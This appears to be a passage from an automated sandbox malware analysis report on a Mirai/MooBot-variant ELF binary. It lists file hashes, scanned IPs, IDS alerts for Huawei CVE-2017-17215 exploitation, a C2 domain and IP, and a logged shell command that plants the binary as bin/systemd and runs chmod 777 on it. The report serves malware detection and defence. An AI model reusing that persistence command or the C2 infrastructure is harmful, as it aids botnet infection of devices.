              41.254.111.167
              		unknownLibyan Arab Jamahiriya
              		21003GPTC-ASLYfalse
              41.120.42.102
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              157.112.124.47
              		unknownJapan58793NIFCLOUD-NETFUJITSUCLOUDTECHNOLOGIESLIMITEDJPfalse
              219.105.240.250
              		unknownJapan4704SANNETRakutenMobileIncJPfalse
              41.28.30.180
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              157.43.70.3
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              197.92.68.241
              		unknownSouth Africa
              		10474OPTINETZAfalse
              41.11.91.57
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              197.141.7.87
              		unknownAlgeria
              		36891ICOSNET-ASDZfalse
              197.146.218.167
              		unknownMorocco
              		36884MAROCCONNECTMAfalse
              157.40.196.111
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              197.109.122.55
              		unknownSouth Africa
              		37168CELL-CZAfalse
              41.152.167.29
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              41.186.134.49
              		unknownRwanda
              		36890MTNRW-ASNRWfalse
              157.194.15.74
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              41.71.111.144
              		unknownSouth Africa
              		37053RSAWEB-ASZAfalse
              41.122.213.28
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              122.90.247.197
              		unknownChina
              		9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
              197.10.101.30
              		unknownTunisia
              		5438ATI-TNfalse
              41.35.105.63
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              2.95.221.135
              		unknownRussian Federation
              		3216SOVAM-ASRUfalse
              157.109.131.144
              		unknownJapan37919SEGASEGAHoldingsCoLtdJPfalse
              197.192.97.8
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              137.103.117.92
              		unknownUnited States
              		11776ATLANTICBB-JOHNSTOWNUSfalse
              161.121.51.16
              		unknownUnited States
              		786JANETJiscServicesLimitedGBfalse
              197.255.13.181
              		unknownNigeria
              		35074COBRANET-ASLBfalse
              164.190.149.31
              		unknownUnited States
              		27064DNIC-ASBLK-27032-27159USfalse
              157.243.207.135
              		unknownFrance
              		25789LMUUSfalse
              197.211.138.42
              		unknownSouth Africa
              		22750BCSNETZAfalse
              41.129.151.32
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              157.202.188.60
              		unknownUnited States
              		1759TSF-IP-CORETeliaFinlandOyjEUfalse
              194.49.23.90
              		unknownGermany
              		42184TKRZ-ASDEfalse
              41.169.37.92
              		unknownSouth Africa
              		36937Neotel-ASZAfalse
              157.211.83.127
              		unknownAustralia
              		7573UTASTheUniversityofTasmaniaAUfalse
              197.123.124.20
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              197.93.232.146
              		unknownSouth Africa
              		10474OPTINETZAfalse
              197.0.2.28
              		unknownTunisia
              		37705TOPNETTNfalse
              41.228.82.100
              		unknownTunisia
              		37492ORANGE-TNfalse
              157.162.179.20
              		unknownGermany
              		22192SSHENETUSfalse
              157.146.249.255
              		unknownUnited States
              		719ELISA-ASHelsinkiFinlandEUfalse
              85.4.217.132
              		unknownSwitzerland
              		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
              157.193.139.197
              		unknownBelgium
              		2611BELNETBEfalse
              189.207.91.25
              		unknownMexico
              		6503AxtelSABdeCVMXfalse
              169.18.126.94
              		unknownUnited States
              		37611AfrihostZAfalse
              157.182.219.38
              		unknownUnited States
              		12118WVUUSfalse
              157.50.48.74
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              157.105.159.172
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              197.205.103.249
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.74.15.31
              		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
              197.129.48.122
              		unknownMorocco
              		6713IAM-ASMAfalse
              209.146.51.20
              		unknownUnited States
              		395753KKRUSfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.274262520522586
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:OMnylKuNNF.elf
              File size:63296
              MD5:8406babfb9b432ee244575aa2e3f63fe
              SHA1:22761d5d5c43e0251bab907054066239a8f35b61
              SHA256:9a067e32dd6c25053c302de7caf61cdc0f3982289eb91d06c449fe08a47fc6d3
              SHA512:c2b9ac112b18050fb243b65a5b220d706c2100df0b55b93c6876f1623fee42c67696cd0fd855b4164aca9025174a2e386a6060f1f7bec96bef9b73e727fd6ba5
              SSDEEP:1536:dpmbSQ6U3q7cCBT/lZsK/0DiQNLiKimfFoktCe3fYRMD:WShU3q7cEDlCK/0D19i8Fok06fYRw
              TLSH:0B534B17B58280FDC09AC1744B2BBA3AD93775FD0378B2A677D0EB262CA6D211E1DD44
              File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................P.......P.............................Q.td....................................................H...._....:...H........

              Static ELF Info

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x4000e80xe80x130x00x6AX001
              .textPROGBITS0x4001000x1000xc8660x00x6AX0016
              .finiPROGBITS0x40c9660xc9660xe0x00x6AX001
              .rodataPROGBITS0x40c9800xc9800x23900x00x2A0032
              .ctorsPROGBITS0x50f0000xf0000x100x00x3WA008
              .dtorsPROGBITS0x50f0100xf0100x100x00x3WA008
              .dataPROGBITS0x50f0400xf0400x4400x00x3WA0032
              .bssNOBITS0x50f4800xf4800x2a100x00x3WA0032
              .shstrtabSTRTAB0x00xf4800x3e0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x4000000x4000000xed100xed106.40160x5R E0x100000.init .text .fini .rodata
              LOAD0xf0000x50f0000x50f0000x4800x2e902.16440x6RW 0x100000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.23197.39.195.6355812372152835222 03/21/23-07:11:34.483333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5581237215192.168.2.23197.39.195.63
              192.168.2.23197.234.59.5340346372152835222 03/21/23-07:10:23.199102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4034637215192.168.2.23197.234.59.53
              192.168.2.23147.46.122.9236620372152835222 03/21/23-07:11:56.415741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662037215192.168.2.23147.46.122.92
              192.168.2.2341.233.131.21952978372152835222 03/21/23-07:10:55.747017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297837215192.168.2.2341.233.131.219
              192.168.2.238.8.8.854536532023883 03/21/23-07:09:52.583756UDP2023883ET DNS Query to a *.top domain - Likely Hostile5453653192.168.2.238.8.8.8
              156.224.24.249192.168.2.2356999477962030489 03/21/23-07:11:48.637846TCP2030489ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response5699947796156.224.24.249192.168.2.23
              192.168.2.2341.36.213.18839138372152835222 03/21/23-07:10:30.344361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913837215192.168.2.2341.36.213.188
              192.168.2.23197.39.34.18859102372152835222 03/21/23-07:10:07.047772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910237215192.168.2.23197.39.34.188
              192.168.2.2386.69.66.25358844372152835222 03/21/23-07:10:54.644031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5884437215192.168.2.2386.69.66.253
              192.168.2.23157.157.112.17554656372152835222 03/21/23-07:09:59.757322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465637215192.168.2.23157.157.112.175
              192.168.2.23172.65.204.14443698372152835222 03/21/23-07:11:38.525358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4369837215192.168.2.23172.65.204.144
              192.168.2.23197.39.190.24448276372152835222 03/21/23-07:11:01.870921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4827637215192.168.2.23197.39.190.244
              192.168.2.2341.62.43.16047544372152835222 03/21/23-07:11:51.897568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754437215192.168.2.2341.62.43.160
              192.168.2.23197.39.167.7139372372152835222 03/21/23-07:10:39.495843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3937237215192.168.2.23197.39.167.71
              192.168.2.23197.148.89.12049098372152835222 03/21/23-07:11:41.620198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909837215192.168.2.23197.148.89.120
              192.168.2.23156.224.24.24947796569992030490 03/21/23-07:09:52.816652TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)4779656999192.168.2.23156.224.24.249
              192.168.2.23213.176.10.17653290372152835222 03/21/23-07:11:34.410258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329037215192.168.2.23213.176.10.176

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Mar 21, 2023 07:09:52.584088087 CET4031237215192.168.2.23144.90.217.179
              Mar 21, 2023 07:09:52.584089994 CET4031237215192.168.2.23157.112.230.44
              Mar 21, 2023 07:09:52.584093094 CET4031237215192.168.2.23197.142.207.141
              Mar 21, 2023 07:09:52.584105968 CET4031237215192.168.2.2367.109.118.174
              Mar 21, 2023 07:09:52.584105968 CET4031237215192.168.2.23103.160.243.179
              Mar 21, 2023 07:09:52.584105968 CET4031237215192.168.2.23197.222.71.55
              Mar 21, 2023 07:09:52.584114075 CET4031237215192.168.2.2339.64.117.198
              Mar 21, 2023 07:09:52.584114075 CET4031237215192.168.2.23197.166.195.205
              Mar 21, 2023 07:09:52.584156036 CET4031237215192.168.2.23197.34.26.9
              Mar 21, 2023 07:09:52.584176064 CET4031237215192.168.2.23157.207.137.67
              Mar 21, 2023 07:09:52.584180117 CET4031237215192.168.2.23197.173.85.160
              Mar 21, 2023 07:09:52.584178925 CET4031237215192.168.2.2370.231.0.9
              Mar 21, 2023 07:09:52.584188938 CET4031237215192.168.2.2341.27.218.47
              Mar 21, 2023 07:09:52.584213972 CET4031237215192.168.2.2341.32.137.247
              Mar 21, 2023 07:09:52.584219933 CET4031237215192.168.2.23197.215.173.184
              Mar 21, 2023 07:09:52.584227085 CET4031237215192.168.2.23197.108.11.134
              Mar 21, 2023 07:09:52.584248066 CET4031237215192.168.2.2341.69.16.9
              Mar 21, 2023 07:09:52.584248066 CET4031237215192.168.2.235.15.36.119
              Mar 21, 2023 07:09:52.584256887 CET4031237215192.168.2.23197.241.208.156
              Mar 21, 2023 07:09:52.584256887 CET4031237215192.168.2.23197.57.255.174
              Mar 21, 2023 07:09:52.584284067 CET4031237215192.168.2.23173.172.132.189
              Mar 21, 2023 07:09:52.584289074 CET4031237215192.168.2.2341.182.44.99
              Mar 21, 2023 07:09:52.584292889 CET4031237215192.168.2.23197.177.93.120
              Mar 21, 2023 07:09:52.584310055 CET4031237215192.168.2.23197.147.30.202
              Mar 21, 2023 07:09:52.584311008 CET4031237215192.168.2.2341.5.39.212
              Mar 21, 2023 07:09:52.584323883 CET4031237215192.168.2.23157.65.123.117
              Mar 21, 2023 07:09:52.584405899 CET4031237215192.168.2.2341.119.158.126
              Mar 21, 2023 07:09:52.584414005 CET4031237215192.168.2.23197.170.42.194
              Mar 21, 2023 07:09:52.584425926 CET4031237215192.168.2.23103.48.114.211
              Mar 21, 2023 07:09:52.584427118 CET4031237215192.168.2.23197.200.253.17
              Mar 21, 2023 07:09:52.584438086 CET4031237215192.168.2.23197.170.121.255
              Mar 21, 2023 07:09:52.584445000 CET4031237215192.168.2.2341.18.158.79
              Mar 21, 2023 07:09:52.584475040 CET4031237215192.168.2.23157.106.252.145
              Mar 21, 2023 07:09:52.584475994 CET4031237215192.168.2.23157.58.97.155
              Mar 21, 2023 07:09:52.584505081 CET4031237215192.168.2.23157.146.31.195
              Mar 21, 2023 07:09:52.584505081 CET4031237215192.168.2.2341.211.68.219
              Mar 21, 2023 07:09:52.584513903 CET4031237215192.168.2.2348.110.217.243
              Mar 21, 2023 07:09:52.584516048 CET4031237215192.168.2.23178.214.93.6
              Mar 21, 2023 07:09:52.584513903 CET4031237215192.168.2.2341.67.60.43
              Mar 21, 2023 07:09:52.584521055 CET4031237215192.168.2.23157.0.255.68
              Mar 21, 2023 07:09:52.585707903 CET4031237215192.168.2.23167.194.236.105
              Mar 21, 2023 07:09:52.585731983 CET4031237215192.168.2.23197.189.169.227
              Mar 21, 2023 07:09:52.585741043 CET4031237215192.168.2.2341.113.133.3
              Mar 21, 2023 07:09:52.585741997 CET4031237215192.168.2.2341.102.87.136
              Mar 21, 2023 07:09:52.585793972 CET4031237215192.168.2.2341.174.146.52
              Mar 21, 2023 07:09:52.585793018 CET4031237215192.168.2.2341.193.18.209
              Mar 21, 2023 07:09:52.585793018 CET4031237215192.168.2.23197.36.114.209
              Mar 21, 2023 07:09:52.585793972 CET4031237215192.168.2.23197.30.69.157
              Mar 21, 2023 07:09:52.585800886 CET4031237215192.168.2.2341.165.196.7
              Mar 21, 2023 07:09:52.585800886 CET4031237215192.168.2.23157.3.145.169
              Mar 21, 2023 07:09:52.585800886 CET4031237215192.168.2.23197.136.75.4
              Mar 21, 2023 07:09:52.585800886 CET4031237215192.168.2.23157.31.196.123
              Mar 21, 2023 07:09:52.585819006 CET4031237215192.168.2.2341.207.95.10
              Mar 21, 2023 07:09:52.585832119 CET4031237215192.168.2.23197.9.10.99
              Mar 21, 2023 07:09:52.585839987 CET4031237215192.168.2.2383.68.182.28
              Mar 21, 2023 07:09:52.585860014 CET4031237215192.168.2.23197.188.3.28
              Mar 21, 2023 07:09:52.585866928 CET4031237215192.168.2.23208.20.45.58
              Mar 21, 2023 07:09:52.585903883 CET4031237215192.168.2.23197.6.190.121
              Mar 21, 2023 07:09:52.585937023 CET4031237215192.168.2.2341.178.124.186
              Mar 21, 2023 07:09:52.585943937 CET4031237215192.168.2.23197.50.183.109
              Mar 21, 2023 07:09:52.586019993 CET4031237215192.168.2.23201.143.54.254
              Mar 21, 2023 07:09:52.586019993 CET4031237215192.168.2.2341.129.28.219
              Mar 21, 2023 07:09:52.586025953 CET4031237215192.168.2.2341.54.6.136
              Mar 21, 2023 07:09:52.586019993 CET4031237215192.168.2.23197.215.80.65
              Mar 21, 2023 07:09:52.586019993 CET4031237215192.168.2.23157.185.75.38
              Mar 21, 2023 07:09:52.586050987 CET4031237215192.168.2.23157.8.111.212
              Mar 21, 2023 07:09:52.586052895 CET4031237215192.168.2.2341.76.115.135
              Mar 21, 2023 07:09:52.586059093 CET4031237215192.168.2.23157.245.170.209
              Mar 21, 2023 07:09:52.586059093 CET4031237215192.168.2.2341.203.69.49
              Mar 21, 2023 07:09:52.586059093 CET4031237215192.168.2.23157.96.66.58
              Mar 21, 2023 07:09:52.586060047 CET4031237215192.168.2.23212.205.232.19
              Mar 21, 2023 07:09:52.586101055 CET4031237215192.168.2.23157.98.130.177
              Mar 21, 2023 07:09:52.586108923 CET4031237215192.168.2.23197.61.196.14
              Mar 21, 2023 07:09:52.586108923 CET4031237215192.168.2.2341.77.68.183
              Mar 21, 2023 07:09:52.586114883 CET4031237215192.168.2.2341.159.20.151
              Mar 21, 2023 07:09:52.586122036 CET4031237215192.168.2.23157.147.213.179
              Mar 21, 2023 07:09:52.586146116 CET4031237215192.168.2.2341.71.230.132
              Mar 21, 2023 07:09:52.586147070 CET4031237215192.168.2.2341.204.38.34
              Mar 21, 2023 07:09:52.586153030 CET4031237215192.168.2.23157.230.62.141
              Mar 21, 2023 07:09:52.586184025 CET4031237215192.168.2.23157.3.124.136
              Mar 21, 2023 07:09:52.586184025 CET4031237215192.168.2.23197.150.155.3
              Mar 21, 2023 07:09:52.586226940 CET4031237215192.168.2.23182.47.193.78
              Mar 21, 2023 07:09:52.586236000 CET4031237215192.168.2.2341.165.182.120
              Mar 21, 2023 07:09:52.586253881 CET4031237215192.168.2.23197.121.183.165
              Mar 21, 2023 07:09:52.586256981 CET4031237215192.168.2.23197.202.117.10
              Mar 21, 2023 07:09:52.586266994 CET4031237215192.168.2.23157.218.242.99
              Mar 21, 2023 07:09:52.586291075 CET4031237215192.168.2.2341.155.136.246
              Mar 21, 2023 07:09:52.586293936 CET4031237215192.168.2.2341.156.86.153
              Mar 21, 2023 07:09:52.586318016 CET4031237215192.168.2.2341.186.133.71
              Mar 21, 2023 07:09:52.586323977 CET4031237215192.168.2.23157.186.145.25
              Mar 21, 2023 07:09:52.586325884 CET4031237215192.168.2.2351.18.127.205
              Mar 21, 2023 07:09:52.586344957 CET4031237215192.168.2.23150.63.70.226
              Mar 21, 2023 07:09:52.586366892 CET4031237215192.168.2.23157.107.254.170
              Mar 21, 2023 07:09:52.586371899 CET4031237215192.168.2.2341.116.183.8
              Mar 21, 2023 07:09:52.586380959 CET4031237215192.168.2.23197.26.89.181
              Mar 21, 2023 07:09:52.586405039 CET4031237215192.168.2.2331.250.169.84
              Mar 21, 2023 07:09:52.586415052 CET4031237215192.168.2.23157.58.208.46
              Mar 21, 2023 07:09:52.586419106 CET4031237215192.168.2.23153.32.27.76
              Mar 21, 2023 07:09:52.586441040 CET4031237215192.168.2.2341.199.215.144
              Mar 21, 2023 07:09:52.586442947 CET4031237215192.168.2.2384.48.48.59

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Mar 21, 2023 07:09:52.583755970 CET192.168.2.238.8.8.80xb28dStandard query (0)j.xnyidc.topA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Mar 21, 2023 07:09:52.602952957 CET8.8.8.8192.168.2.230xb28dNo error (0)j.xnyidc.top156.224.24.249A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:/tmp/OMnylKuNNF.elf
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:sh -c "rm -rf bin/systemd && mkdir bin; >2\\xffbin/systemd && mv /tmp/OMnylKuNNF.elf bin/systemd; chmod 777 bin/systemd"
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/rm
              Arguments:rm -rf bin/systemd
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/mkdir
              Arguments:mkdir bin
              File size:88408 bytes
              MD5 hash:088c9d1df5a28ed16c726eca15964cb7

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/bin/sh
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/usr/bin/chmod
              Arguments:chmod 777 bin/systemd
              File size:63864 bytes
              MD5 hash:739483b900c045ae1374d6f53a86a279

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe

              General

              Start time:07:09:51
              Start date:21/03/2023
              Path:/tmp/OMnylKuNNF.elf
              Arguments:n/a
              File size:63296 bytes
              MD5 hash:8406babfb9b432ee244575aa2e3f63fe